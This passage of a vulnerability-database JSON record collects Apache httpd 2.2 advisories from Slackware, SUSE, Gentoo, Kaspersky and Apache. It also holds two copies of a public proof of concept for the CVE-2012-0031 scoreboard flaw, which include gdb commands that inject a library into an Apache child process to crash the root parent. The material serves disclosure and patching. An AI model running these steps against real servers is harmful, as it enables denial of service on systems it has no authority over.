Resolve additional cases of URL rewriting with ProxyPassMatch or\n RewriteRule, where particular request-URIs could result in undesired\n backend network exposure in some configurations.\n [Joe Orton]\n *) SECURITY: CVE-2012-0021 (cve.mitre.org)\n mod_log_config: Fix segfault (crash) when the '%{cookiename}C' log format\n string is in use and a client sends a nameless, valueless cookie, causing\n a denial of service. The issue existed since version 2.2.17. PR 52256.\n [Rainer Canavan <rainer-apache 7val com>]\n *) SECURITY: CVE-2012-0031 (cve.mitre.org)\n Fix scoreboard issue which could allow an unprivileged child process\n could cause the parent to crash at shutdown rather than terminate\n cleanly. [Joe Orton]\n *) SECURITY: CVE-2012-0053 (cve.mitre.org)\n Fix an issue in error responses that could expose "httpOnly" cookies\n when no custom ErrorDocument is specified for status code 400.\n [Eric Covener]\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3368\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3607\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4317\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0021\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0031\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0053\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated packages for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/apr-util-1.4.1-i486-1_slack12.0.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/httpd-2.2.22-i486-1_slack12.0.tgz\n\nUpdated packages for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/apr-util-1.4.1-i486-1_slack12.1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/httpd-2.2.22-i486-1_slack12.1.tgz\n\nUpdated packages for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/apr-util-1.4.1-i486-1_slack12.2.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/httpd-2.2.22-i486-1_slack12.2.tgz\n\nUpdated packages for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/apr-util-1.4.1-i486-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/httpd-2.2.22-i486-1_slack13.0.txz\n\nUpdated packages for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/apr-util-1.4.1-x86_64-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/httpd-2.2.22-x86_64-1_slack13.0.txz\n\nUpdated packages for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/apr-util-1.4.1-i486-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/httpd-2.2.22-i486-1_slack13.1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/apr-util-1.4.1-x86_64-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/httpd-2.2.22-x86_64-1_slack13.1.txz\n\nUpdated packages for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/apr-util-1.4.1-i486-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/httpd-2.2.22-i486-1_slack13.37.txz\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/apr-util-1.4.1-x86_64-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/httpd-2.2.22-x86_64-1_slack13.37.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/apr-util-1.4.1-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.2.22-i486-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/apr-util-1.4.1-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.2.22-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 12.0 packages:\n3143affee7e89d16a2f5b4f58f1f2c9d apr-util-1.4.1-i486-1_slack12.0.tgz\n86c2b71a544c9533794951f718bd907b httpd-2.2.22-i486-1_slack12.0.tgz\n\nSlackware 12.1 packages:\naab31157fa672bb2bc11851b486c9d5c apr-util-1.4.1-i486-1_slack12.1.tgz\n1362ef9a9b2d355e1cf9b5c7e0ae0607 httpd-2.2.22-i486-1_slack12.1.tgz\n\nSlackware 12.2 packages:\nf30f1f0a949f321b6aefb99a703eca3f apr-util-1.4.1-i486-1_slack12.2.tgz\n18fd6ddd6e6bbf4a7222ade821ec1aa1 httpd-2.2.22-i486-1_slack12.2.tgz\n\nSlackware 13.0 packages:\nd3600fef7f1cabb62554417567fb55ab apr-util-1.4.1-i486-1_slack13.0.txz\n0456c808efb92da333942ff939746d77 httpd-2.2.22-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 packages:\nd15c2e0a4aa074bbadfa50099da482b2 apr-util-1.4.1-x86_64-1_slack13.0.txz\n1b72685b2519bbf167973d88dce562e1 httpd-2.2.22-x86_64-1_slack13.0.txz\n\nSlackware 13.1 packages:\n9c7c2bb99c99f3a6275f0dc9636ce38c apr-util-1.4.1-i486-1_slack13.1.txz\n49a5e4a73be2328d80cca186efe2f6f7 httpd-2.2.22-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 packages:\n4f9dcb6495c04d3094cc68050440505b apr-util-1.4.1-x86_64-1_slack13.1.txz\n1f378f8a4d990d7298e0155b22cfcf19 httpd-2.2.22-x86_64-1_slack13.1.txz\n\nSlackware 13.37 packages:\n7feb382700511d72737c5a31e91ee56e apr-util-1.4.1-i486-1_slack13.37.txz\n783de593b5827c8601e2b486cf98397f httpd-2.2.22-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 packages:\n1bd4b3df67a0449f3015e82e47cd808d apr-util-1.4.1-x86_64-1_slack13.37.txz\n8999903e736cbb29c055ea2bf66cfed1 httpd-2.2.22-x86_64-1_slack13.37.txz\n\nSlackware -current packages:\ne709c8056cede91c35fd354ad5b654df l/apr-util-1.4.1-i486-1.txz\n97c295a42d4678537c62d6ce54d3e1fa n/httpd-2.2.22-i486-1.txz\n\nSlackware x86_64 -current packages:\n55fdf36b05ff7e82aa9a015289290424 l/apr-util-1.4.1-x86_64-1.txz\n09daa138b81fbf877596e4abc2a01bb6 n/httpd-2.2.22-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg apr-util-1.4.1-i486-1_slack13.37.txz httpd-2.2.22-i486-1_slack13.37.txz\n\nThen, restart the httpd daemon.", "modified": "2012-02-10T09:43:57", "published": "2012-02-10T09:43:57", "id": "SSA-2012-041-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2012&m=slackware-security.792124", "title": "httpd", "type": "slackware", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "suse": [{"lastseen": "2016-09-04T11:18:00", "bulletinFamily": "unix", "description": "This update of apache2 fixes regressions and several\n security problems:\n\n bnc#728876, fix graceful reload\n\n bnc#741243, CVE-2012-0031: Fixed a scoreboard corruption\n (shared mem segment) by child causes crash of privileged\n parent (invalid free()) during shutdown.\n\n bnc#743743, CVE-2012-0053: Fixed an issue in error\n responses that could expose "httpOnly" cookies when no\n custom ErrorDocument is specified for status code 400".\n\n bnc#738855, CVE-2007-6750: The "mod_reqtimeout" module was\n backported from Apache 2.2.21 to help mitigate the\n "Slowloris" Denial of Service attack.\n\n You need to enable the "mod_reqtimeout" module in your\n existing apache configuration to make it effective, e.g. in\n the APACHE_MODULES line in /etc/sysconfig/apache2.\n\n", "modified": "2012-02-28T18:08:26", "published": "2012-02-28T18:08:26", "id": "OPENSUSE-SU-2012:0314-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-02/msg00026.html", "title": "apache2: fixed various security bugs (important)", "type": "suse", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:26:04", "bulletinFamily": "unix", "description": "This update of apache2 and libapr1 fixes regressions and\n several security problems.\n\n * CVE-2012-0031: Fixed a scoreboard corruption (shared\n mem segment) by child causes crash of privileged parent\n (invalid free()) during shutdown.\n * CVE-2012-0053: Fixed an issue in error responses that\n could expose "httpOnly" cookies when no custom\n ErrorDocument is specified for status code 400".\n * CVE-2007-6750: The "mod_reqtimeout" module was\n backported from Apache 2.2.21 to help mitigate the\n "Slowloris" Denial of Service attack.\n\n You need to enable the "mod_reqtimeout" module in your\n existing apache configuration to make it effective, e.g.\n in the APACHE_MODULES line in /etc/sysconfig/apache2. For\n more detailed information, check also the README file.\n\n Also the following bugs have been fixed:\n\n * Fixed init script action "check-reload" to avoid\n potential crashes. bnc#728876\n * An overlapping memcpy() was replaced by memmove() to\n make this work with newer glibcs. bnc#738067 bnc#741874\n * libapr1: reset errno to zero to not return previous\n value despite good status of new operation. bnc#739783\n", "modified": "2012-02-18T13:08:15", "published": "2012-02-18T13:08:15", "id": "SUSE-SU-2012:0284-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-02/msg00016.html", "type": "suse", "title": "Security update for Apache2 (important)", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:03:38", "bulletinFamily": "unix", "description": "This update of apache fixes regressions and several\n security problems:\n\n *\n\n bnc#741243, CVE-2012-0031: Fixed a scoreboard\n corruption (shared mem segment) by child causes crash of\n privileged parent (invalid free()) during shutdown.\n\n *\n\n bnc#743743,CVE-2012-0053: Fixed an issue in error\n responses that could expose "httpOnly" cookies when no\n custom ErrorDocument is specified for status code 400".\n\n *\n\n bnc#736706, the SSL configuration template suggested\n weak ciphers\n\n *\n\n bnc#738855,CVE-2007-6750: The "mod_reqtimeout" module\n was backported from Apache 2.2.21 to help mitigate the\n "Slowloris" Denial of Service attack.\n\n You need to enable the "mod_reqtimeout" module in\n your existing apache configuration to make it effective,\n e.g. in the APACHE_MODULES line in /etc/sysconfig/apache2.\n", "modified": "2012-03-06T21:08:42", "published": "2012-03-06T21:08:42", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-03/msg00002.html", "id": "SUSE-SU-2012:0323-1", "title": "Security update for Apache2 (important)", "type": "suse", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "kaspersky": [{"lastseen": "2019-02-15T12:33:59", "bulletinFamily": "info", "description": "### *Detect date*:\n07/22/2013\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Apache httpd. Malicious users can exploit these vulnerabilities to gain privileges, cause denial of service, execute arbitrary code, obtain sensitive information or bypass security restrictions. Below is a complete list of vulnerabilities\n\n### *Affected products*:\nApache httpd 2.0 versions 2.0.64 and earlier\n\n### *Solution*:\nUpdate to latest version\n\n### *Original advisories*:\n[Apache changelog](<http://httpd.apache.org/security/vulnerabilities_20.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Apache HTTP Server](<https://threats.kaspersky.com/en/product/Apache-HTTP-Server/>)\n\n### *CVE-IDS*:\n[CVE-2011-3192](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192>) \n[CVE-2013-1862](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1862>) \n[CVE-2012-0031](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0031>) \n[CVE-2011-0419](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0419>) \n[CVE-2011-3607](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3607>) \n[CVE-2011-3368](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3368>) \n[CVE-2012-0053](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0053>)", "modified": "2019-02-13T00:00:00", "published": "2013-07-22T00:00:00", "id": "KLA10065", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10065", "title": "\r KLA10065Multiple vulnerabilities in Apache httpd ", "type": "kaspersky", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "httpd": [{"lastseen": "2018-08-31T00:35:47", "bulletinFamily": "software", "description": "\nAn integer overflow flaw was found which, when the mod_setenvif module\nis enabled, could allow local users to gain privileges via a .htaccess\nfile.\n\n", "modified": "2011-11-02T00:00:00", "published": "2011-10-04T00:00:00", "id": "HTTPD:560EB66BD0C9D4921E114954F57484F0", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < None: mod_setenvif .htaccess privilege escalation", "type": "httpd", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "description": "\nAn integer overflow flaw was found which, when the mod_setenvif module\nis enabled, could allow local users to gain privileges via a .htaccess\nfile.\n\n", "modified": "2013-07-22T00:00:00", "published": "2011-10-04T00:00:00", "id": "HTTPD:CD3865BDB48B91719A525A87DFA73750", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.0.65: mod_setenvif .htaccess privilege escalation", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:35:47", "bulletinFamily": "software", "description": "\nA flaw was found in the handling of the scoreboard. An \nunprivileged child process could cause the parent process to crash at \nshutdown rather than terminate cleanly. \n\n", "modified": "2012-01-11T00:00:00", "published": "2011-12-30T00:00:00", "id": "HTTPD:98531A1B4917D4CDD88FDEF74307A1F3", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < None: scoreboard parent DoS", "type": "httpd", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "description": "\nAn integer overflow flaw was found which, when the mod_setenvif module\nis enabled, could allow local users to gain privileges via a .htaccess\nfile.\n\n", "modified": "2012-01-31T00:00:00", "published": "2011-10-04T00:00:00", "id": "HTTPD:19058D084C7C00E6FB6A3AD068C9416B", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.2.22: mod_setenvif .htaccess privilege escalation", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "description": "\nA flaw was found in the handling of the scoreboard. An \nunprivileged child process could cause the parent process to crash at \nshutdown rather than terminate cleanly. \n\n", "modified": "2012-01-31T00:00:00", "published": "2011-12-30T00:00:00", "id": "HTTPD:8BA47632F35C9AB31E24EEFA64CB532A", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.2.22: scoreboard parent DoS", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "description": "\nA flaw was found in the handling of the scoreboard. An \nunprivileged child process could cause the parent process to crash at \nshutdown rather than terminate cleanly. \n\n", "modified": "2013-07-22T00:00:00", "published": "2011-12-30T00:00:00", "id": "HTTPD:2D6863E2D9663FEAEBBED0A62CE75D64", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.0.65: scoreboard parent DoS", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2017-03-29T15:16:56", "bulletinFamily": "exploit", "description": "Apache 2.2 - Scoreboard Invalid Free On Shutdown. CVE-2012-0031. Dos exploit for Linux platform", "modified": "2012-01-11T00:00:00", "published": "2012-01-11T00:00:00", "id": "EDB-ID:41768", "href": "https://www.exploit-db.com/exploits/41768/", "type": "exploitdb", "title": "Apache 2.2 - Scoreboard Invalid Free On Shutdown", "sourceData": "Source: http://www.halfdog.net/Security/2011/ApacheScoreboardInvalidFreeOnShutdown/\r\n\r\n## Introduction\r\n\r\nApache 2.2 webservers may use a shared memory segment to share child process status information (scoreboard) between the child processes and the parent process running as root. A child running with lower privileges than the parent process might trigger an invalid free in the privileged parent process during parent shutdown by modifying data on the shared memory segment.\r\n\r\n## Method\r\n\r\nA child process can trigger the bug by changing the value of ap_scoreboard_e sb_type, which resides in the global_score structure on the shared memory segment. The value is usually 2 (SB_SHARED):\r\n\r\ntypedef struct {\r\n int server_limit;\r\n int thread_limit;\r\n ap_scoreboard_e sb_type;\r\n ap_generation_t running_generation; /* the generation of children which\r\n * should still be serving requests.\r\n */\r\n apr_time_t restart_time;\r\n int lb_limit;\r\n} global_score;\r\n\r\nWhen changing the scoreboard type of a shared memory segment to something else, the root process will try to release the shared memory using free during normal shutdown. Since the memory was allocated using mmap, not malloc, the call to free from ap_cleanup_scoreboard (server/scoreboard.c) triggers abort within libc.\r\n\r\napr_status_t ap_cleanup_scoreboard(void *d)\r\n{\r\n if (ap_scoreboard_image == NULL) {\r\n return APR_SUCCESS;\r\n }\r\n if (ap_scoreboard_image->global->sb_type == SB_SHARED) {\r\n ap_cleanup_shared_mem(NULL);\r\n }\r\n else {\r\n free(ap_scoreboard_image->global);\r\n free(ap_scoreboard_image);\r\n ap_scoreboard_image = NULL;\r\n }\r\n return APR_SUCCESS;\r\n}\r\n\r\nAbort output is written to apache default error log:\r\n\r\n[Fri Dec 30 10:19:57 2011] [notice] caught SIGTERM, shutting down\r\n*** glibc detected *** /usr/sbin/apache2: free(): invalid pointer: 0xb76f4008 ***\r\n======= Backtrace: =========\r\n/lib/i386-linux-gnu/libc.so.6(+0x6ebc2)[0x17ebc2]\r\n/lib/i386-linux-gnu/libc.so.6(+0x6f862)[0x17f862]\r\n/lib/i386-linux-gnu/libc.so.6(cfree+0x6d)[0x18294d]\r\n/usr/sbin/apache2(ap_cleanup_scoreboard+0x29)[0xa57519]\r\n/usr/lib/libapr-1.so.0(+0x19846)[0x545846]\r\n/usr/lib/libapr-1.so.0(apr_pool_destroy+0x52)[0x5449ec]\r\n/usr/sbin/apache2(+0x1f063)[0xa52063]\r\n/usr/sbin/apache2(main+0xeea)[0xa51e3a]\r\n/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0x129113]\r\n/usr/sbin/apache2(+0x1ef3d)[0xa51f3d]\r\n======= Memory map: ========\r\n00110000-00286000 r-xp 00000000 08:01 132367\r\n\r\nTo reproduce, attach to a www-data (non-root) child process and increment the value at offset 0x10 in the shared memory segment. The search and replace can also be accomplished by compiling LibScoreboardTest.c (http://www.halfdog.net/Security/2011/ApacheScoreboardInvalidFreeOnShutdown/LibScoreboardTest.c) and loading it into a child process using gdb --pid [childpid] and following commands:\r\n\r\nset *(int*)($esp+4)=\"/var/www/libExploit.so\"\r\nset *(int*)($esp+8)=1\r\nset $eip=*__libc_dlopen_mode\r\ncontinue\r\n\r\nWithout gdb, the mod_setenv exploit demo (2nd attempt) (http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/DemoExploit.html) could be used to load the code.", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/41768/"}], "gentoo": [{"lastseen": "2016-09-06T19:46:13", "bulletinFamily": "unix", "description": "### Background\n\nApache HTTP Server is one of the most popular web servers on the Internet. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Apache HTTP Server. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker might obtain sensitive information, gain privileges, send requests to unintended servers behind proxies, bypass certain security restrictions, obtain the values of HTTPOnly cookies, or cause a Denial of Service in various ways. \n\nA local attacker could gain escalated privileges.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Apache HTTP Server users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-servers/apache-2.2.22-r1\"", "modified": "2012-06-24T00:00:00", "published": "2012-06-24T00:00:00", "id": "GLSA-201206-25", "href": "https://security.gentoo.org/glsa/201206-25", "type": "gentoo", "title": "Apache HTTP Server: Multiple vulnerabilities", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-01T11:14:09", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2017-03-29T00:00:00", "published": "2017-03-29T00:00:00", "href": "https://0day.today/exploit/description/27465", "id": "1337DAY-ID-27465", "type": "zdt", "title": "Apache 2.2 - Scoreboard Invalid Free On Shutdown Vulnerability", "sourceData": "Source: http://www.halfdog.net/Security/2011/ApacheScoreboardInvalidFreeOnShutdown/\r\n \r\n## Introduction\r\n \r\nApache 2.2 webservers may use a shared memory segment to share child process status information (scoreboard) between the child processes and the parent process running as root. A child running with lower privileges than the parent process might trigger an invalid free in the privileged parent process during parent shutdown by modifying data on the shared memory segment.\r\n \r\n## Method\r\n \r\nA child process can trigger the bug by changing the value of ap_scoreboard_e sb_type, which resides in the global_score structure on the shared memory segment. The value is usually 2 (SB_SHARED):\r\n \r\ntypedef struct {\r\n int server_limit;\r\n int thread_limit;\r\n ap_scoreboard_e sb_type;\r\n ap_generation_t running_generation; /* the generation of children which\r\n * should still be serving requests.\r\n */\r\n apr_time_t restart_time;\r\n int lb_limit;\r\n} global_score;\r\n \r\nWhen changing the scoreboard type of a shared memory segment to something else, the root process will try to release the shared memory using free during normal shutdown. Since the memory was allocated using mmap, not malloc, the call to free from ap_cleanup_scoreboard (server/scoreboard.c) triggers abort within libc.\r\n \r\napr_status_t ap_cleanup_scoreboard(void *d)\r\n{\r\n if (ap_scoreboard_image == NULL) {\r\n return APR_SUCCESS;\r\n }\r\n if (ap_scoreboard_image->global->sb_type == SB_SHARED) {\r\n ap_cleanup_shared_mem(NULL);\r\n }\r\n else {\r\n free(ap_scoreboard_image->global);\r\n free(ap_scoreboard_image);\r\n ap_scoreboard_image = NULL;\r\n }\r\n return APR_SUCCESS;\r\n}\r\n \r\nAbort output is written to apache default error log:\r\n \r\n[Fri Dec 30 10:19:57 2011] [notice] caught SIGTERM, shutting down\r\n*** glibc detected *** /usr/sbin/apache2: free(): invalid pointer: 0xb76f4008 ***\r\n======= Backtrace: =========\r\n/lib/i386-linux-gnu/libc.so.6(+0x6ebc2)[0x17ebc2]\r\n/lib/i386-linux-gnu/libc.so.6(+0x6f862)[0x17f862]\r\n/lib/i386-linux-gnu/libc.so.6(cfree+0x6d)[0x18294d]\r\n/usr/sbin/apache2(ap_cleanup_scoreboard+0x29)[0xa57519]\r\n/usr/lib/libapr-1.so.0(+0x19846)[0x545846]\r\n/usr/lib/libapr-1.so.0(apr_pool_destroy+0x52)[0x5449ec]\r\n/usr/sbin/apache2(+0x1f063)[0xa52063]\r\n/usr/sbin/apache2(main+0xeea)[0xa51e3a]\r\n/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0x129113]\r\n/usr/sbin/apache2(+0x1ef3d)[0xa51f3d]\r\n======= Memory map: ========\r\n00110000-00286000 r-xp 00000000 08:01 132367\r\n \r\nTo reproduce, attach to a www-data (non-root) child process and increment the value at offset 0x10 in the shared memory segment. The search and replace can also be accomplished by compiling LibScoreboardTest.c (http://www.halfdog.net/Security/2011/ApacheScoreboardInvalidFreeOnShutdown/LibScoreboardTest.c) and loading it into a child process using gdb --pid [childpid] and following commands:\r\n \r\nset *(int*)($esp+4)=\"/var/www/libExploit.so\"\r\nset *(int*)($esp+8)=1\r\nset $eip=*__libc_dlopen_mode\r\ncontinue\r\n \r\nWithout gdb, the mod_setenv exploit demo (2nd attempt) (http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/DemoExploit.html) could be used to load the code.\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/27465", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}